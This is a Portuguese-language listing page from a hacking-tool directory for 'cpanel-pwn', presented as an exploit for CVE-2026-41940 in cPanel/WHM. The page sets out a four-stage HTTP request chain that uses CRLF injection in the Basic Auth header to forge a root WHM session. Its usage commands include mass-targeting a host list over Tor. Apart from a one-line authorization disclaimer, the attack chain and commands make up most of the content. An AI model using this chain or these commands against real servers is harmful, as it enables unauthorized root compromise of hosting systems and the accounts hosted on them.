Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cpanel-pwn — cPanel/WHM CVE-2026-41940 exploit de injeção CRLF para bypass de autenticação | Kitploit
Ferramentas/GitHubGitHub/richflexpix/cpanel-pwn
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubrichflexpix/cpanel-pwn

cpanel-pwn

cPanel/WHM CVE-2026-41940 exploit de injeção CRLF para bypass de autenticação

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

cpanel-pwn

Kit de testes de segurança para cPanel/WHM. Implementa o bypass de autenticação por injeção de CRLF CVE-2026-41940 e o pivô de privilégios pós-exploração.

Ferramentas

ScriptFinalidade
cpanel_exploit.pyCVE-2026-41940: injeção de CRLF → bypass de autenticação WHM → acesso root

CVE-2026-41940

Tipo: Injeção de CRLF → Bypass de Autenticação → RCE como root
Afetados: cPanel/WHM < versões corrigidas
Ataque: A injeção de CRLF pré-autenticação no cabeçalho Basic Auth injeta no arquivo de sessão do lado do servidor, elevando uma sessão não autenticada para root do WHM.

hasroot=1
root@kitploit:~
Estágio 1: POST /login/?login_only=1          → gera sessão pré-autenticação
Estágio 2: GET / Authorization:Basic <CRLF>   → injeta hasroot=1, vaza token cpsess
Estágio 3: GET /scripts2/listaccts            → aciona gadget de propagação de cache de sessão
Estágio 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + versão = ACESSO ROOT

Uso

root@kitploit:~
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only   # apenas verificação de CRLF, sem escalonamento de privilégios

Autorização

Apenas para testes de penetração autorizados.

Baixar ferramenta